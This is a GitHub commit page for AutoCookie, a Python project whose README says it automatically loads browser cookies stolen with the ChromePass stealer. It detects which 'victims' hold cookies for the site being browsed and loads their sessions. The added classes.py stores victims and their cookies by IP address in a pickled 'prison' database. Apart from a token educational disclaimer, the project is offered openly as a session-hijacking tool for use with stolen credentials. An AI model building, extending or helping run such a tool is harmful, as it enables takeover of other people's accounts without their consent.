Skip to content

Commit

Permalink
origin
Browse files Browse the repository at this point in the history
  • Loading branch information
darkarp committed Mar 13, 2021
1 parent b84a054 commit 1444d23
Show file tree
Hide file tree
Showing 10 changed files with 408 additions and 2 deletions.
5 changes: 5 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
.vscode/settings.json
__pycache__/
*.pyc
*.log
*.db
21 changes: 21 additions & 0 deletions LICENSE
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
MIT License

Copyright (c) 2021 Mario Nascimento

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
146 changes: 144 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,144 @@
# AutoCookie
Automatically load stolen cookies from ChromePass
<h1 align='center'>AutoCookie - Automatically loading stolen cookies from ChromePass</h1>
<p align="center">
<img src="https://img.shields.io/badge/Platform-Windows-green" />
<a href="https://github.com/darkarp/autocookie/releases/latest">
<img src="https://img.shields.io/github/v/release/darkarp/autocookie" alt="Release" />
</a>
<a href="#">
<img src="https://img.shields.io/badge/build-passing-green" alt="Build Status on CircleCI" />
</a>
<img src="https://img.shields.io/maintenance/yes/2021" />
</br>

<a href="https://github.com/darkarp/autocookie/commits/master">
<img src="https://img.shields.io/github/last-commit/darkarp/autocookie" />
</a>
<img alt="Scrutinizer code quality (GitHub/Bitbucket)" src="https://img.shields.io/scrutinizer/quality/g/darkarp/autocookie?style=flat">
<a href="https://github.com/darkarp/autocookie/blob/master/LICENSE">
<img src="http://img.shields.io/github/license/darkarp/autocookie" />
</a>
</br>
<a href="https://github.com/darkarp/autocookie/issues?q=is%3Aopen+is%3Aissue">
<img alt="GitHub issues" src="https://img.shields.io/github/issues/darkarp/autocookie">
</a
<a href="https://github.com/darkarp/autocookie/issues?q=is%3Aissue+is%3Aclosed">
<img alt="GitHub closed issues" src="https://img.shields.io/github/issues-closed/darkarp/autocookie">
</a>
</br>
<a href="https://discord.gg/beczNYP">
<img src="https://img.shields.io/badge/discord-join-7289DA.svg?logo=discord&longCache=true&style=flat" />
</a>
</br>
<a href="https://i.imgur.com/qaa1BSP.gif" target="_blank">View Demo</a>
·
<a href="https://github.com/darkarp/autocookie/issues/new?assignees=&labels=&template=bug_report.md&title=">Report Bug</a>
·
<a href="https://github.com/darkarp/autocookie/issues/new?assignees=&labels=&template=feature_request.md&title=">Request Feature</a>
</p>


<!-- TABLE OF CONTENTS -->
## Table of Contents

* [About the Project](#about-the-project)
* [Getting started](#getting-started)
* [Prerequisites](#dependencies-and-requirements)
* [Installation](#installation)
* [Usage](#usage)
* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)
* [Learn More](#learn-more)
* [License](#license)
---
## About The project
AutoCookie requires the data stolen using [ChromePass](https://github.com/darkarp/chromepass) or data in the same format.

It's a python-based console application that starts a browser with the following features:

- Automatically detects victims who have cookies on the website you're in.
- Automatically loads cookies for the chosen victim on that browser session.

---

## Getting started

### Dependencies and Requirements

This is a very simple application, which uses only:

* [Python] - Tested on python 3.6+
* [Geckodriver] - Make sure you have firefox downloaded as well

### Installation

Autocookie can be used in any operating system but it requires the stolen cookies obtained from [ChromePass](https://github.com/darkarp/chromepass) or the same format of cookies.

First, make sure you have [Firefox] installed (latest version). The `geckodriver.exe` is already included but if it doesn't work it should be replaced with the latest version: [Geckodriver]

Clone the repository:
```powershell
git clone https://github.com/darkarp/autocookie
```

Install the dependencies:

```powershell
cd autocookie
pip install -r requirements.txt
```

If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+
If the errors persist, try:
```powershell
python -m pip install --upgrade pip
python -m pip install -r requirements.txt
```

---

## Usage

Chromepass is very straightforward. Start by running:
```powershell
> python autocookie.py
```
A browser window will show up. Here, you can navigate to any website you want.

On the terminal window you will be notified whether any victims were found to have cookies for that particular website.

All you have to do is either select the victim you'd like to load, or skip loading for that website.

If victims were found for a website and you change the url on the browser, you must skip the prompt on the terminal before it can recognize that the url has changed.

### Notes
>This is a very early release with just the basic functionality.
`Refactorization` and `support for multiple cookie files from the same ip address`, as well as `command-line parameter-based usage` will be added in the future.

---

## Errors, Bugs and feature requests

If you find an error or a bug, please report it as an issue.
If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.

---

## Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran,
join our Discord Server: [WhiteHat Hacking](https://discord.gg/beczNYP)

If you wish to contact me, you can do so via: `mario@whitehathacking.tech`

---

## Disclaimer
I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

## License
<a href="https://github.com/darkarp/autocookie/blob/master/LICENSE"> MIT </a>

[Python]: <https://www.python.org/downloads/>
[Firefox]: <https://www.mozilla.org/en-US/firefox/new/>
[Geckodriver]: <https://github.com/mozilla/geckodriver/releases>
Binary file added _modules/__pycache__/classes.cpython-39.pyc
Binary file not shown.
89 changes: 89 additions & 0 deletions _modules/classes.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,89 @@
import pickle
import os
from datetime import timezone, datetime


class Prison:
def __init__(self, filename="prison.db") -> None:
self.filename = filename
self.victims = self._load_db() or self._create_db()

def _create_db(self):
with open(self.filename, "wb") as f:
pickle.dump([], f)
return []

def _save_db(self):
with open(self.filename, "wb") as f:
pickle.dump(self.victims, f)

def _load_db(self):
if os.path.exists(self.filename):
with open(self.filename, "rb") as f:
return pickle.load(f)
return False

def add_victim(self, victim):
if self._is_new_victim(victim):
self.victims.append(victim)
else:
print(
f"[-] Victim {victim.ip} already in data, skipping... (to be implemented)")

def get_victim(self, ip):
for victim in self.victims:
if victim.ip == ip:
return victim

def _is_new_victim(self, new_victim):
for victim in self.victims:
if victim.ip == new_victim.ip:
return False
return True

def from_domains(self, domains):
result = {}
for victim in self.victims:
cookies = victim.cookies.from_domains(domains)
if cookies:
result[victim.ip] = cookies
return result


class Cookie:
def __init__(self, name, value, domain) -> None:
self.name = name
self.value = value
self.domain = domain

def __str__(self) -> str:
return self.domain


class CookieJar:
def __init__(self, cookies: list[Cookie]) -> None:
self.cookies = {}
for cookie in cookies:
if cookie.domain not in self.cookies:
self.cookies[cookie.domain] = []
self.cookies[cookie.domain].append(cookie)

def from_domains(self, domains: list):
result = []
for domain in domains:
if domain in self.cookies:
result.append(self.cookies[domain])
return result


class Victim:
def __init__(self, ip_address, date=datetime.now(timezone.utc)) -> None:
self.ip = ip_address
self.cookies = None
self.date = date

def get_date(self):
return self.date.strftime("%d-%B-%Y (%H:%M:%S)")

def update_cookies(self, cookie_jar):
self.cookies = cookie_jar
Loading

0 comments on commit 1444d23

Please sign in to comment.